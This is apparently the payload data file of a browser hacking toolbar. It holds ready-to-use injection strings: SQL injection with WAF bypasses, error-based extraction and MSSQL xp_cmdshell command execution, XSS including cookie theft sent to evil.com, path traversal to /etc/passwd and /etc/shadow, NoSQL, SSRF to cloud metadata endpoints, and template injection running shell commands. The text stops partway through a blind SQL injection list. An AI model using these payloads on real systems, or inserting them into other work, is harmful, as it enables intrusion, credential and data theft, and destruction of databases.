// ============================================================
// payloads.js - Payload data for all attack categories
// ============================================================
// This file contains only pure data - no DOM dependencies.

// ---- Namespace ----
window.KHackBar = window.KHackBar || {};
window.KHackBar.Payloads = window.KHackBar.Payloads || {};

// ---- Predator Data (Payload sets for each attack type) ----
const predatorData = {
  sql: [
    "' OR '1'='1",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR 1=1--",
    "' OR 1=1--+",
    "' OR 1=1--)",
    "' OR 1=1--/*",
    "' OR 'x'='x",
    "' OR '1'='1'-- -",
    "' AND 1=1-- -",
    "' AND 1=2-- -",
    "admin'--",
    "admin'#",
    "admin'/*",
    "admin' OR '1'='1",
    "admin' OR 1=1-- -",
    "admin\"--",
    "admin\"#",
    "admin\" OR \"1\"=\"1",
    "admin\" OR 1=1-- -",
    "') OR ('1'='1",
    "') OR 1=1-- -",
    "') OR ('1'='1'--",
    "')) OR ((1=1-- -",
    "' OR 1=1 UNION SELECT 1-- -",
    "' UNION SELECT 1,2,3-- -",
    "' UNION SELECT NULL-- -",
    "' UNION SELECT NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL-- -",
    "1' ORDER BY 1-- -",
    "1' ORDER BY 2-- -",
    "1' ORDER BY 3-- -",
    "1' ORDER BY 4-- -",
    "1' ORDER BY 5-- -",
    "1' ORDER BY 6-- -",
    "1' ORDER BY 7-- -",
    "1' ORDER BY 8-- -",
    "1' ORDER BY 9-- -",
    "1' ORDER BY 10-- -",
    "' AND SLEEP(5)-- -",
    "' AND SLEEP(10)-- -",
    "' AND BENCHMARK(10000000,MD5('test'))-- -",
    "' AND 1=1--",
    "' AND 1=2--",
    "' AND '1'='1",
    "' AND '1'='2",
    "' AND 1=(SELECT 1 FROM dual)-- -",
    "' AND EXISTS(SELECT 1 FROM users)-- -",
    "' OR EXISTS(SELECT 1 FROM users WHERE username='admin' AND password LIKE 'a%')-- -",
    "'; DROP TABLE users-- -",
    "'; DROP TABLE users--",
    "'; DROP TABLE users#",
    "' UNION SELECT @@version,2,3-- -",
    "' UNION SELECT database(),user(),version()-- -",
    "' UNION SELECT table_name,2,3 FROM information_schema.tables-- -",
    "' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'-- -",
    "' AND 1=0 UNION SELECT 1,database(),version()-- -",
    "' AND 1=0 UNION SELECT 1,database(),@@datadir-- -",
    "' AND 1=0 UNION SELECT 1,user(),@@hostname-- -"
  ],

  union: [
    "1 UNION SELECT 1-- -",
    "1 UNION SELECT 1,2-- -",
    "1 UNION SELECT 1,2,3-- -",
    "1 UNION SELECT 1,2,3,4-- -",
    "1 UNION SELECT 1,2,3,4,5-- -",
    "1 UNION SELECT 1,2,3,4,5,6-- -",
    "1 UNION SELECT 1,2,3,4,5,6,7-- -",
    "1 UNION SELECT 1,2,3,4,5,6,7,8-- -",
    "1 UNION SELECT 1,2,3,4,5,6,7,8,9-- -",
    "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -",
    "-1 UNION SELECT 1,2,3-- -",
    "-1 UNION SELECT 1,2,3,4-- -",
    "-1 UNION SELECT 1,2,3,4,5-- -",
    "-1 UNION SELECT 1,2,3,4,5,6-- -",
    "NULL UNION SELECT 1,2,3-- -",
    "NULL UNION SELECT 1,2,3,4-- -",
    "' UNION SELECT 1,2,3-- -",
    "' UNION SELECT 1,2,3,4-- -",
    "' UNION SELECT 1,2,3,4,5-- -",
    "' UNION SELECT 1,2,3,4,5,6-- -",
    "' UNION SELECT 1,2,3,4,5,6,7-- -",
    "' UNION SELECT 1,2,3,4,5,6,7,8-- -",
    "') UNION SELECT 1,2,3-- -",
    "') UNION SELECT 1,2,3,4-- -",
    "') UNION SELECT 1,2,3,4,5-- -",
    "') UNION SELECT 1,2,3,4,5,6-- -",
    "')) UNION SELECT 1,2,3-- -",
    "1 UNION SELECT @@version,2,3-- -",
    "1 UNION SELECT database(),user(),version()-- -",
    "1 UNION SELECT group_concat(table_name),2,3 FROM information_schema.tables WHERE table_schema=database()-- -",
    "1 UNION SELECT group_concat(column_name),2,3 FROM information_schema.columns WHERE table_name='users'-- -",
    "1 UNION SELECT group_concat(username,0x3a,password),2,3 FROM users-- -",
    "1 AND 1=2 UNION SELECT 1,database(),@@datadir-- -",
    "1 AND 1=2 UNION SELECT 1,user(),@@hostname-- -",
    "1 AND 1=2 UNION SELECT 1,load_file('/etc/passwd'),3-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
  ],

  wafunion: [
    "1 UNION/**/SELECT 1,2,3-- -",
    "1 UNION/**/SELECT 1,2,3,4-- -",
    "1 UNION/**/SELECT 1,2,3,4,5-- -",
    "1/**/UNION/**/SELECT/**/1,2,3-- -",
    "1/**/UNION/**/SELECT/**/1,2,3,4-- -",
    "1%0aUNION%0aSELECT%0a1,2,3-- -",
    "1%0aUNION%0aSELECT%0a1,2,3,4-- -",
    "1%0d%0aUNION%0d%0aSELECT%0d%0a1,2,3-- -",
    "1%09UNION%09SELECT%091,2,3-- -",
    "1%0aUNION%0aALL%0aSELECT%0a1,2,3-- -",
    "1 UNION ALL SELECT 1,2,3-- -",
    "1 UNION ALL SELECT 1,2,3,4-- -",
    "1 UNION DISTINCT SELECT 1,2,3-- -",
    "1 UNION DISTINCTROW SELECT 1,2,3-- -",
    "' UNION/**/SELECT 1,2,3-- -",
    "' UNION/**/SELECT 1,2,3,4-- -",
    "'/**/UNION/**/SELECT/**/1,2,3-- -",
    "1' UNION SELECT 1,2,3-- -",
    "1\" UNION SELECT 1,2,3-- -",
    "1` UNION SELECT 1,2,3-- -",
    "1 UNION(SELECT 1,2,3)-- -",
    "1 UNION(SELECT 1,2,3,4)-- -",
    "1 UNION(SELECT 1,2,3,4,5)-- -",
    "1 UNION ALL(SELECT 1,2,3)-- -",
    "1 UNION/**/SELECT(SELECT 1),2,3-- -",
    "1 UNION SELECT/*!1,2,3*/-- -",
    "1 UNION SELECT{1,2,3}-- -",
    "1 UNION SELECT`1`,2,3-- -",
    "1 UNION SELECT[1],2,3-- -",
    "1 UNION SELECT 1,@@version,3-- -",
    "1 UNION(SELECT 1,database(),user())-- -",
    "1 UNION(SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database())-- -",
    "1 UNION(SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=0x7573657273)-- -",
    "1 UNION(SELECT 1,group_concat(login,0x3a,password),3 FROM users)-- -",
    "1 UNION(SELECT 1,@@basedir,@@datadir)-- -",
    "1 UNION(SELECT 1,load_file(0x2f6574632f706173737764),3)-- -",
    "1 UNION(SELECT 1,@@version,@@hostname)-- -"
  ],

  waf: [
    "' OR '1'='1",
    "' OR 1=1-- -",
    "' OR/**/1=1-- -",
    "' OR%0a1=1-- -",
    "' OR%0d%0a1=1-- -",
    "' OR 1=1#",
    "' OR 1=1%23",
    "' OR 1=2-- -",
    "' AND 1=1-- -",
    "' AND 1=2-- -",
    "admin'-- -",
    "admin'#",
    "admin'/*",
    "admin\"--",
    "admin\"#",
    "admin\"/*",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR 1=1/*",
    "' OR 1=1--",
    "') OR ('1'='1",
    "')) OR ((1=1",
    "1' ORDER BY 1-- -",
    "1' ORDER BY 2-- -",
    "1' ORDER BY 3-- -",
    "' UNION SELECT 1,2,3-- -",
    "' UNION SELECT NULL-- -",
    "' UNION SELECT NULL,NULL-- -",
    "' AND SLEEP(5)-- -",
    "' AND SLEEP(10)-- -",
    "' AND BENCHMARK(5000000,MD5('x'))-- -",
    "1' AND 1=(SELECT 1 FROM dual)-- -",
    "'; DROP TABLE users-- -",
    "' UNION SELECT @@version,2,3-- -",
    "' UNION SELECT database(),user(),version()-- -",
    "' UNION SELECT table_name,2,3 FROM information_schema.tables-- -",
    "' UNION SELECT column_name,2,3 FROM information_schema.columns-- -",
    "' OR 1=1 LIMIT 1-- -",
    "' OR 1=1 GROUP BY 1-- -",
    "' OR 1=1 HAVING 1=1-- -",
    "'/*!ORA*/'1'='1",
    "'/*!AND*/'1'='1",
    "'/*!OR*/'1'='1"
  ],

  mysqldios: [
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@version) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT database()) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT user()) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT table_name FROM information_schema.tables LIMIT 0,1),2,3),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT column_name FROM information_schema.columns LIMIT 0,1),2,3),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT CONCAT(table_name,0x3a,column_name) FROM information_schema.columns LIMIT 0,1),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT CONCAT(login,0x3a,password) FROM users LIMIT 0,1),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "1 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@basedir)),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "1 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@datadir)),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@version_compile_os)),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@hostname)),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT @@plugin_dir)),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -"
  ],

  postgredios: [
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT version()))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_database()))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_user))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT table_name FROM information_schema.tables LIMIT 1))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT column_name FROM information_schema.columns LIMIT 1))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT CONCAT(table_name,0x3a,column_name) FROM information_schema.columns LIMIT 1),FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT CONCAT(usename,0x3a,passwd) FROM pg_shadow LIMIT 1),FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT inet_server_addr()))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_setting('server_version')))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_setting('data_directory')))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_setting('config_file')))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT current_setting('hba_file')))::text,FLOOR(RAND()*2))x FROM generate_series(1,1000) GROUP BY x)a)-- -"
  ],

  localdios: [
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/passwd'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/hosts'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/issue'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/proc/self/cmdline'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/proc/self/environ'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/nginx/nginx.conf'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/apache2/apache2.conf'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/my.cnf'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE(CONCAT(CHAR(92),CHAR(92),CHAR(119),CHAR(105),CHAR(110),CHAR(100),CHAR(111),CHAR(119),CHAR(115),CHAR(92),CHAR(119),CHAR(105),CHAR(110),CHAR(46),CHAR(105),CHAR(110),CHAR(105))))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/var/log/apache2/access.log'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/var/log/nginx/access.log'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT LOAD_FILE('/etc/ssh/sshd_config'))),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -"
  ],

  mssql: [
    "1' OR '1'='1",
    "1' OR 1=1--",
    "1' OR 1=1-- -",
    "1' OR 1=1/*",
    "1' OR '1'='1'--",
    "1' OR 1=1--",
    "admin'--",
    "admin'#",
    "admin'/*",
    "1' UNION SELECT 1--",
    "1' UNION SELECT 1,2--",
    "1' UNION SELECT 1,2,3--",
    "1' UNION SELECT 1,2,3,4--",
    "1' UNION SELECT 1,2,3,4,5--",
    "' UNION SELECT @@version,2,3--",
    "' UNION SELECT db_name(),user_name(),@@servername--",
    "' UNION SELECT table_name,2,3 FROM information_schema.tables--",
    "' UNION SELECT column_name,2,3 FROM information_schema.columns--",
    "1' AND 1=1--",
    "1' AND 1=2--",
    "1' AND 1=CONVERT(int,(SELECT @@version))--",
    "1' WAITFOR DELAY '00:00:05'--",
    "1' WAITFOR DELAY '00:00:10'--",
    "'; EXEC xp_cmdshell('whoami')--",
    "'; EXEC xp_cmdshell('dir C:\\')--",
    "'; EXEC xp_cmdshell('ipconfig')--",
    "' UNION SELECT 1,@@version,3--",
    "' UNION SELECT 1,db_name(),3--",
    "' UNION SELECT 1,user_name(),3--",
    "' UNION SELECT 1,name,3 FROM sys.databases--",
    "' UNION SELECT 1,name,3 FROM sysobjects--",
    "' UNION SELECT 1,name,3 FROM syscolumns WHERE id=OBJECT_ID('users')--",
    "1' ORDER BY 1--",
    "1' ORDER BY 2--",
    "1' ORDER BY 3--",
    "1' ORDER BY 4--",
    "1' ORDER BY 5--",
    "1' ORDER BY 6--",
    "1' ORDER BY 7--",
    "1' ORDER BY 8--",
    "1' ORDER BY 9--",
    "1' ORDER BY 10--"
  ],

  error: [
    "'",
    "\"",
    "`",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR 'x'='x",
    "' AND 1=1-- -",
    "' AND 1=2-- -",
    "1'",
    "1\"",
    "1`",
    "1' ORDER BY 1-- -",
    "1' ORDER BY 2-- -",
    "1' ORDER BY 3-- -",
    "1' ORDER BY 4-- -",
    "1' ORDER BY 5-- -",
    "1' ORDER BY 6-- -",
    "1' ORDER BY 7-- -",
    "1' ORDER BY 8-- -",
    "1' ORDER BY 9-- -",
    "1' ORDER BY 10-- -",
    "1' GROUP BY 1-- -",
    "1' GROUP BY 2-- -",
    "1' GROUP BY 3-- -",
    "1' GROUP BY 4-- -",
    "1' GROUP BY 5-- -",
    "1' GROUP BY 1,2-- -",
    "1' GROUP BY 1,2,3-- -",
    "1' HAVING 1=1-- -",
    "1' HAVING 1=2-- -",
    "' HAVING 1=1-- -",
    "' GROUP BY 1-- -",
    "1 AND 1=CONVERT(int, @@version)-- -",
    "1 AND 1=CONVERT(int, (SELECT 1))-- -",
    "convert(int,@@version)",
    "convert(int,db_name())",
    "CAST(@@version AS int)",
    "CAST(db_name() AS int)",
    "1/0",
    "1/(SELECT 1 FROM dual WHERE 1=1)",
    "1/(SELECT 1 FROM dual WHERE 1=2)",
    "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version)))-- -",
    "1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT @@version)),1)-- -"
  ],

  xss: [
    "<script>alert(1)</script>",
    "<script>alert('XSS')</script>",
    "<script>alert(document.cookie)</script>",
    "<img src=x onerror=alert(1)>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert(1)>",
    "<svg onload=alert('XSS')>",
    "<body onload=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<marquee onstart=alert(1)>",
    "<video><source onerror=alert(1)>",
    "<audio><source onerror=alert(1)>",
    "javascript:alert(1)",
    "\"><script>alert(1)</script>",
    "'\"><script>alert(1)</script>",
    "<<script>alert(1)</script>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "<script>eval(atob('YWxlcnQoMSk='))</script>",
    "<script>document.write('<img src=x onerror=alert(1)>')</script>",
    "\" onmouseover=\"alert(1)\"",
    "\" onfocus=\"alert(1)\" autofocus",
    "' onfocus='alert(1)' autofocus",
    "<a href=\"javascript:alert(1)\">click</a>",
    "<iframe src=javascript:alert(1)>",
    "<img src=\"x\" onerror=\"eval(atob('YWxlcnQoMSk='))\">",
    "<script>fetch('https://evil.com/?c='+document.cookie)</script>",
    "<script>new Image().src='https://evil.com/?c='+document.cookie</script>",
    "<script>document.location='https://evil.com/?c='+document.cookie</script>",
    "<script>var x=new XMLHttpRequest();x.open('GET','https://evil.com/?c='+document.cookie);x.send()</script>",
    "';alert(1);//",
    "\";alert(1);//",
    "`;alert(1);//",
    "';alert(1)<!--",
    "<script>alert(1)</script><!--",
    "--><script>alert(1)</script>",
    "</script><script>alert(1)</script>",
    "<script>alert(1)</script><script>",
    "<script>alert(1)</script>",
    "\"><img src=x onerror=alert(1)>",
    "'';!--\"<XSS>=&{()}",
    "<IMG SRC=\"jav	ascript:alert(1)\">",
    "<IMG SRC=\"jav&#x09;ascript:alert(1)\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert(1)\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert(1)\">"
  ],

  lfi: [
    "../../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd%00",
    "../../../../../../../../etc/shadow",
    "../../../../../../../../etc/issue",
    "../../../../../../../../etc/hosts",
    "../../../../../../../../etc/hostname",
    "../../../../../../../../etc/group",
    "../../../../../../../../etc/shells",
    "../../../../../../../../etc/services",
    "../../../../../../../../etc/motd",
    "../../../../../../../../etc/aliases",
    "../../../../../../../../etc/crontab",
    "../../../../../../../../etc/resolv.conf",
    "../../../../../../../../etc/ssh/sshd_config",
    "../../../../../../../../etc/apache2/apache2.conf",
    "../../../../../../../../etc/nginx/nginx.conf",
    "../../../../../../../../etc/my.cnf",
    "../../../../../../../../etc/my.cnf",
    "../../../../../../../../proc/self/environ",
    "../../../../../../../../proc/self/cmdline",
    "../../../../../../../../proc/self/status",
    "../../../../../../../../proc/self/fd/0",
    "../../../../../../../../proc/self/fd/1",
    "../../../../../../../../proc/self/fd/2",
    "../../../../../../../../var/log/apache2/access.log",
    "../../../../../../../../var/log/apache2/error.log",
    "../../../../../../../../var/log/nginx/access.log",
    "../../../../../../../../var/log/nginx/error.log",
    "../../../../../../../../var/log/auth.log",
    "../../../../../../../../var/log/syslog",
    "../../../../../../../../var/log/messages",
    "../../../../../../../../var/log/dmesg",
    "../../../../../../../../var/log/wtmp",
    "../../../../../../../../var/log/lastlog",
    "../../../../../../../../var/log/secure",
    "../../../../../../../../var/log/httpd/access_log",
    "../../../../../../../../var/log/httpd/error_log",
    "../../../../../../../../usr/local/etc/php/php.ini",
    "../../../../../../../../etc/php.ini",
    "../../../../../../../../Windows/system32/drivers/etc/hosts",
    "../../../../../../../../Windows/win.ini",
    "../../../../../../../../Windows/System32/license.rtf",
    "../../../../../../../../boot.ini",
    "....//....//....//....//....//....//....//....//etc/passwd",
    "..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
    "/etc/passwd",
    "/etc/shadow",
    "/etc/issue",
    "/etc/hosts",
    "/etc/hostname"
  ],

  nosql: [
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' || 1==1//",
    "' || 1==1%00",
    "' || 1==1'",
    "admin' || 1==1//",
    "admin' || 1==1'",
    "admin' || 1==1%00",
    "admin' --",
    "admin' #",
    "admin'/*",
    "true",
    "$gt: ''",
    "$ne: ''",
    "$where: '1==1'",
    "{$gt: ''}",
    "{$ne: ''}",
    "{'$gt': ''}",
    "{'$ne': ''}",
    "';return true//",
    "';return true%00",
    "admin$gt:",
    "admin$ne:",
    "admin$where:",
    "admin')//",
    "'",
    "\"",
    "`",
    "' && 1==1//",
    "' && 1==1'",
    "' && 1==1%00",
    "' || true//",
    "' || true'",
    "' || true%00",
    "';return true;var foo='",
    "';return true;var foo=\"",
    "';return true;var foo=`",
    "'-1'",
    "'-1'",
    "1’",
    "1'",
    "1"
  ],

  ssrf: [
    "http://127.0.0.1:80",
    "http://127.0.0.1:443",
    "http://127.0.0.1:22",
    "http://127.0.0.1:3306",
    "http://127.0.0.1:6379",
    "http://127.0.0.1:8080",
    "http://127.0.0.1:8443",
    "http://localhost:80",
    "http://localhost:443",
    "http://localhost:22",
    "http://localhost:3306",
    "http://localhost:6379",
    "http://localhost:8080",
    "http://localhost:8443",
    "http://[::1]:80",
    "http://[::1]:443",
    "http://[::1]:22",
    "http://[::1]:3306",
    "http://[::1]:6379",
    "http://[::1]:8080",
    "http://[::1]:8443",
    "http://0.0.0.0:80",
    "http://0.0.0.0:443",
    "http://0.0.0.0:22",
    "http://0.0.0.0:3306",
    "http://0.0.0.0:6379",
    "http://0.0.0.0:8080",
    "http://0.0.0.0:8443",
    "http://10.0.0.1:80",
    "http://10.0.0.1:443",
    "http://172.16.0.1:80",
    "http://172.16.0.1:443",
    "http://192.168.1.1:80",
    "http://192.168.1.1:443",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/user-data/",
    "http://metadata.google.internal/",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://100.100.100.200/latest/meta-data/",
    "file:///etc/passwd",
    "file:///etc/shadow",
    "file:///proc/self/environ",
    "file:///proc/self/cmdline",
    "file:///c:/windows/win.ini",
    "file:///c:/boot.ini",
    "dict://127.0.0.1:6379/info",
    "dict://127.0.0.1:6379/config",
    "gopher://127.0.0.1:6379/",
    "ftp://127.0.0.1:21",
    "ftp://anonymous@127.0.0.1:21"
  ],

  ssrf_rce: [
    "http://127.0.0.1:80/exec?cmd=whoami",
    "http://127.0.0.1:80/exec?cmd=id",
    "http://127.0.0.1:80/exec?cmd=ls",
    "http://127.0.0.1:80/exec?cmd=cat%20/etc/passwd",
    "http://127.0.0.1:80/exec?cmd=ifconfig",
    "http://127.0.0.1:80/exec?cmd=uname%20-a",
    "http://127.0.0.1:80/cgi-bin/",
    "http://127.0.0.1:80/cgi-bin/test.cgi",
    "http://127.0.0.1:80/cgi-bin/printenv",
    "http://127.0.0.1:80/cgi-bin/hello",
    "http://127.0.0.1:80/cgi-bin/test",
    "http://127.0.0.1:8080/manager/html",
    "http://127.0.0.1:8080/jmx-console",
    "http://127.0.0.1:8080/admin",
    "http://127.0.0.1:8443/manager/html",
    "http://127.0.0.1:8443/jmx-console",
    "http://127.0.0.1:8443/admin",
    "http://127.0.0.1:9200/",
    "http://127.0.0.1:9200/_cat",
    "http://127.0.0.1:9200/_nodes",
    "http://127.0.0.1:9200/_cluster",
    "http://127.0.0.1:5601/api/",
    "http://127.0.0.1:5601/app/kibana",
    "http://127.0.0.1:3000/",
    "http://127.0.0.1:3000/api/",
    "http://127.0.0.1:3000/admin",
    "http://127.0.0.1:5000/",
    "http://127.0.0.1:5000/admin",
    "http://127.0.0.1:5000/console",
    "http://127.0.0.1:7001/",
    "http://127.0.0.1:7001/admin",
    "http://127.0.0.1:9042/",
    "http://127.0.0.1:9042/admin",
    "http://127.0.0.1:9090/",
    "http://127.0.0.1:9090/admin"
  ],

  ssti: [
    "{{7*7}}",
    "{{7*'7'}}",
    "${7*7}",
    "#{7*7}",
    "*{7*7}",
    "{{config}}",
    "{{self}}",
    "{{request}}",
    "{{request.application}}",
    "{{request.environ}}",
    "{{get_flashed_messages.__globals__.__builtins__}}",
    "{{''.__class__.__mro__[2].__subclasses__()}}",
    "{{''.__class__.__mro__[2].__subclasses__()[40]}}",
    "{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}",
    "{{lipsum.__globals__['os'].popen('id').read()}}",
    "{{lipsum.__globals__['os'].popen('whoami').read()}}",
    "{{lipsum.__globals__['os'].popen('ls').read()}}",
    "{{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}",
    "{{url_for.__globals__['os'].popen('id').read()}}",
    "{{url_for.__globals__['os'].popen('whoami').read()}}",
    "{{url_for.__globals__['os'].popen('cat /etc/passwd').read()}}",
    "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
    "{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}",
    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
    "{{cycler.__init__.__globals__.os.popen('id').read()}}",
    "{{joiner.__init__.__globals__.os.popen('id').read()}}",
    "{{namespace.__init__.__globals__.os.popen('id').read()}}",
    "{%print(7*7)%}",
    "{%print(config)%}",
    "{%print(self)%}",
    "{%print(request)%}",
    "${7*7}",
    "#{7*7}",
    "*{7*7}",
    "<%= 7*7 %>",
    "<%= system('id') %>",
    "<%= system('whoami') %>",
    "<%= system('cat /etc/passwd') %>"
  ],

  blind: [
    "1' AND 1=1-- -",
    "1' AND 1=2-- -",
    "1' AND SLEEP(5)-- -",
    "1' AND SLEEP(10)-- -",
    "1' AND SLEEP(15)-- -",
    "1' AND BENCHMARK(5000000,MD5('test'))-- -",
